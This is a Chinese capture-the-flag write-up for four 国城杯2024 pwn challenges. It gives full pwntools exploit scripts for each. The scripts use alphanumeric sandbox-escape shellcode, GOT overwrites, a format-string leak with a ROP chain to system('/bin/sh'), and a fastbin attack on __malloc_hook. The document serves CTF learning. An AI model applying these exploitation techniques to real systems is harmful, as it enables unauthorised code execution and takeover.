
国城杯2024 PWN WP

国城杯2024 PWN WP

alphashell


分析

要求输入字符为可见字符

sandbox 禁用了 open、write、writev、read 和 execve 等函数

EXP

from pwn import *
from ctypes import *
from ae64 import AE64
#----------------function area start----------------#
def sla(ch, data):
    """Wait until `ch` arrives from the target, then send `data` plus a newline."""
    return p.sendlineafter(ch, data)


def sda(ch, data):
    """Wait until `ch` arrives from the target, then send `data` unchanged."""
    return p.sendafter(ch, data)


def sd(data):
    """Send raw bytes to the target."""
    return p.send(data)


def sl(data):
    """Send `data` followed by a newline."""
    return p.sendline(data)


def addr32():
    """Read up to a 0xf7 byte and unpack the last four bytes as a little-endian u32."""
    return u32(p.recvuntil(b"\xf7")[-4:])


def addr64():
    """Read up to a 0x7f byte and unpack the last six bytes, zero-padded to eight, as a u64."""
    return u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))


def lg(addr_name, addr):
    """Log `addr` in hex under the label `addr_name`."""
    return log.success("{} --> {}".format(addr_name, hex(addr)))


def ru(con):
    """Receive from the target until `con` has been seen."""
    return p.recvuntil(con)
def debug(bp=0):
    """Attach gdb to the live tube `p` (second argument forwarded to gdb.attach) and pause."""
    gdb.attach(p, bp)
    pause()
#----------------function area end------------------#

# Local process by default; the remote() line below is the contest instance,
# kept commented out so the same script can be replayed against either.
p = process("./attachment")
# p = remote('125.70.243.22','31709')
# context.log_level = 'debug'
# asm() and the AE64 encoder below both key off this architecture setting.
context.arch='amd64'

# The analysis above says the sandbox blocks open/read/write/writev/execve, so
# this payload uses openat + sendfile instead.  0x67616c662f is the little-endian
# bytes of "/flag"; it is pushed so rsp can serve as the path pointer, and the
# opened fd (rax) is then copied, up to 0x100 bytes, to fd 1.  Comments must stay
# outside the string: it is assembled verbatim.
sc=asm('''
xor rsi,rsi
mov rbx,0x67616c662f
push rbx
mov rdx,0
xor r10,r10
mov rdi,r10
mov rsi, rsp
mov eax,SYS_openat
syscall

mov rsi,rax
mov r10,0x100
xor rdx,rdx
mov rdi,1
mov eax,SYS_sendfile
syscall
''')

# Input is restricted to printable characters (see analysis), so the raw
# shellcode is re-encoded into an alphanumeric form.  The second argument is
# the register AE64 assumes holds the buffer address at entry — confirm it
# matches where the binary leaves the input before jumping to it.
obj = AE64()
payload = obj.encode(sc,'rdx')
# debug()
p.send(payload)


p.interactive()

beverage store

分析

类型转换错误,导致可以反向越界修改之前的内容

对于这道题,可以先修改exit got,重启程序流程

接着修改printf got为system,最后把exit got重新改为后门函数地址即可

EXP

from pwn import *
from ctypes import *
#----------------function area start----------------#
def sla(ch, data):
    """Wait until `ch` arrives from the target, then send `data` plus a newline."""
    return p.sendlineafter(ch, data)


def sda(ch, data):
    """Wait until `ch` arrives from the target, then send `data` unchanged."""
    return p.sendafter(ch, data)


def sd(data):
    """Send raw bytes to the target."""
    return p.send(data)


def sl(data):
    """Send `data` followed by a newline."""
    return p.sendline(data)


def addr32():
    """Read up to a 0xf7 byte and unpack the last four bytes as a little-endian u32."""
    return u32(p.recvuntil(b"\xf7")[-4:])


def addr64():
    """Read up to a 0x7f byte and unpack the last six bytes, zero-padded to eight, as a u64."""
    return u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))


def lg(addr_name, addr):
    """Log `addr` in hex under the label `addr_name`."""
    return log.success("{} --> {}".format(addr_name, hex(addr)))


def ru(con):
    """Receive from the target until `con` has been seen."""
    return p.recvuntil(con)
def debug(bp=0):
    """Attach gdb to the live tube `p` (second argument forwarded to gdb.attach) and pause."""
    gdb.attach(p, bp)
    pause()
#----------------function area end------------------#
# p = process("./pwn")
p = remote('125.70.243.22','31668')
libc = ELF('./libc.so.6')
# The challenge libc is also loaded through ctypes so its rand() sequence can be
# reproduced locally with the same seed.
clibc = cdll.LoadLibrary('./libc.so.6')
context.log_level='debug'

# Identity check: 16 'B' bytes are sent as the id, and 0x42424242 is four 'B'
# bytes, so the seed appears to be derived from that input — confirm against
# the binary.  The first rand() value is then sent back as the code.
ru("id")
p.send(b'B'*0x10)
clibc.srand(0x42424242)
num = clibc.rand()
ru("code:")
sl(str(num))

# Negative indices: the analysis above attributes these to a type-conversion
# bug that lets a negative index write before the buffer, reaching the GOT.
# The analysis describes the sequence exit GOT -> printf GOT -> exit GOT; the
# slot numbers -4 / -7 / -4 below are matched to it by order.  Fixed sleeps
# keep the remote prompts in step with our sends.
# First write: two adjacent 8-byte slots; 0x401511 is the address the author
# describes as the backdoor function.
sleep(1)
sl(b'-4')
payload = p64(0x40133B) + p64(0x401511)
sd(payload)
sl(b'-6')

# Slot -6 with a single byte: the output that follows is parsed for a libc
# pointer.  0x46061 is an offset specific to the shipped libc.so.6.
sleep(1)
sd(b'a')
libc_base = addr64() - 0x46061
lg('libc_base',libc_base)
system = libc_base + libc.sym['system']

# Point the slot -7 entry at system, then restore slot -4 to the backdoor
# address (per the analysis: printf GOT, then exit GOT).
sleep(1)
sl(b'-7')
payload = p64(system)
sd(payload)
sl(b'-4')
sleep(1)
payload = p64(0x401511)
sd(payload)


p.interactive()

Offensive_Security

分析




多线程但是未对资源加锁,输入任意同样的字符串即可绕过限制


存在格式化字符串漏洞,可泄露密码和libc基址

最后栈溢出然后getshell

EXP

from pwn import *
from ctypes import *
#----------------function area start----------------#
def sla(ch, data):
    """Wait until `ch` arrives from the target, then send `data` plus a newline."""
    return p.sendlineafter(ch, data)


def sda(ch, data):
    """Wait until `ch` arrives from the target, then send `data` unchanged."""
    return p.sendafter(ch, data)


def sd(data):
    """Send raw bytes to the target."""
    return p.send(data)


def sl(data):
    """Send `data` followed by a newline."""
    return p.sendline(data)


def addr32():
    """Read up to a 0xf7 byte and unpack the last four bytes as a little-endian u32."""
    return u32(p.recvuntil(b"\xf7")[-4:])


def addr64():
    """Read up to a 0x7f byte and unpack the last six bytes, zero-padded to eight, as a u64."""
    return u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))


def lg(addr_name, addr):
    """Log `addr` in hex under the label `addr_name`."""
    return log.success("{} --> {}".format(addr_name, hex(addr)))


def ru(con):
    """Receive from the target until `con` has been seen."""
    return p.recvuntil(con)
def debug(bp=0):
    """Attach gdb to the live tube `p` (second argument forwarded to gdb.attach) and pause."""
    gdb.attach(p, bp)
    pause()
#----------------function area end------------------#
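# p = process("./attachment")
elf = ELF('./attachment')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# context.log_level = 'debug'

# Retry loop: each attempt opens a fresh connection and is abandoned unless the
# leaked pointer has the low byte the hard-coded libc offset expects.
# Fixes over the original: the retry guard is `except Exception` rather than a
# bare `except:` (so Ctrl-C can stop the loop), the mismatch case raises a real
# exception instead of a str (a TypeError in Python 3), and `p` is pre-bound so
# a failed remote() on the first attempt cannot NameError in the handler.
p = None
while True:
    sleep(1)
    try:
        p = remote('125.70.243.22','31652')
        sleep(0.1)
        # Format-string input: per the analysis above this reflects the stored
        # password (%7$s) and a pointer (%39$p) in the greeting line.
        sla('Username:','%7$s%39$p')
        ru('Welcome, \n')
        passwd = p.recv(8)
        sleep(0.1)
        sl(passwd)
        libc_leak = addr64()
        lg('libc_leak',libc_leak)
        # 0x21b780 is an offset into this specific libc build; the low-byte
        # check rejects leaks that do not land on the expected symbol.
        if (libc_leak & 0xff) != 0x80:
            raise RuntimeError('环境有毛病')
        libc_base = libc_leak - 0x21b780
        lg('libc base',libc_base)
        # Two identical answers: the analysis attributes the bypass to an
        # unlocked check shared between threads — confirm against the binary.
        sl('1')
        sl('1')
        # Stack-overflow payload (see analysis): 0x28 bytes of padding, two
        # binary-local addresses, then a libc-relative "/bin/sh" pointer and
        # system.
        payload = b'A'*0x28 + p64(0x0000000000400462) + p64(0x0000000000400661) + p64(libc_base+next(libc.search(b'/bin/sh'))) + p64(libc_base+libc.sym.system)
        sla('>',payload)
        p.interactive()
        break
    except Exception:
        # Ordinary failures (connection, timeout, bad leak) tear the tube down
        # and try again; KeyboardInterrupt now propagates.
        if p is not None:
            p.close()
        continue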

hijack_vtable

分析

没啥好分析的,add、show、delete、edit都没限制,直接fastbin attack打malloc hook

EXP

from pwn import *
from ctypes import *
#----------------function area start----------------#
def sla(ch, data):
    """Wait until `ch` arrives from the target, then send `data` plus a newline."""
    return p.sendlineafter(ch, data)


def sda(ch, data):
    """Wait until `ch` arrives from the target, then send `data` unchanged."""
    return p.sendafter(ch, data)


def sd(data):
    """Send raw bytes to the target."""
    return p.send(data)


def sl(data):
    """Send `data` followed by a newline."""
    return p.sendline(data)


def addr32():
    """Read up to a 0xf7 byte and unpack the last four bytes as a little-endian u32."""
    return u32(p.recvuntil(b"\xf7")[-4:])


def addr64():
    """Read up to a 0x7f byte and unpack the last six bytes, zero-padded to eight, as a u64."""
    return u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))


def lg(addr_name, addr):
    """Log `addr` in hex under the label `addr_name`."""
    return log.success("{} --> {}".format(addr_name, hex(addr)))


def ru(con):
    """Receive from the target until `con` has been seen."""
    return p.recvuntil(con)
def debug(bp=0):
    """Attach gdb to the live tube `p` (second argument forwarded to gdb.attach) and pause."""
    gdb.attach(p, bp)
    pause()
#----------------function area end------------------#
# p = process("./pwn")
# Remote contest instance; the process() line above is kept for local replay.
p = remote('125.70.243.22','31986')
# Challenge libc: its symbol table supplies the __malloc_hook offset used below.
libc = ELF('./libc.so.6')
# Log every send/receive on the tube.
context.log_level = 'debug'

def cmd(choice):
    """Answer the menu prompt with `choice` rendered as a decimal string."""
    selection = str(choice)
    sla('choice:', selection)


def add(idx, size):
    """Menu option 1: allocate a chunk of `size` bytes in slot `idx`.

    A short pause precedes each answer so the remote prompt and our input
    stay in step.
    """
    cmd(1)
    for prompt, value in (('index', idx), ('size', size)):
        sleep(0.1)
        sla(prompt, str(value))

def delete(idx):
    """Menu option 2: free the chunk in slot `idx`."""
    cmd(2)
    slot = str(idx)
    sla('index', slot)

def edit(idx, len, con):
    """Menu option 3: write `con` into slot `idx`, declaring `len` bytes.

    The second parameter keeps the author's name `len` for call compatibility;
    note that it shadows the builtin inside this function.
    """
    cmd(3)
    sla('index', str(idx))
    for prompt, answer in (('length:', str(len)), ('content:', con)):
        sleep(0.1)
        sla(prompt, answer)

def show(idx):
    """Menu option 4: print the contents of slot `idx`."""
    cmd(4)
    slot = str(idx)
    sla('index', slot)
# Leak: allocate two chunks, free the larger one and read it back while freed.
# show() on a freed slot is the unchecked use-after-free the analysis relies on;
# the bytes read back contain a libc pointer, and 0x39bb78 is an offset
# specific to the shipped libc.so.6.
add(0,0x100)
add(1,0x60)
delete(0)
show(0)

libc_base = addr64() - 0x39bb78
lg('libc base',libc_base)

malloc_hook = libc_base + libc.symbols['__malloc_hook']

# Fastbin attack on __malloc_hook (see analysis): edit the freed 0x60 chunk so
# its forward pointer names a fake chunk just before the hook.  The -0x23
# offset is where the author places that fake header — confirm it passes this
# libc's fastbin size check.
delete(1)
edit(1,0x10,p64(malloc_hook - 0x23))

# Re-allocate: the second 0x60 request presumably returns the fake chunk (the
# 0x13 padding in the next edit is consistent with that).
add(0,0x100)
add(1,0x60)
add(2,0x60)

# User data of the fake chunk starts 0x13 bytes before __malloc_hook, so the
# padding lands the following qword exactly on the hook.  0xd5c07 is a
# libc-relative target for this build; what it points at is not shown here.
edit(2,0x30,b'a'*0x13 + p64(libc_base + 0xd5c07))

# Any further allocation now goes through the overwritten hook.
add(3,0x10)
# debug()



p.interactive()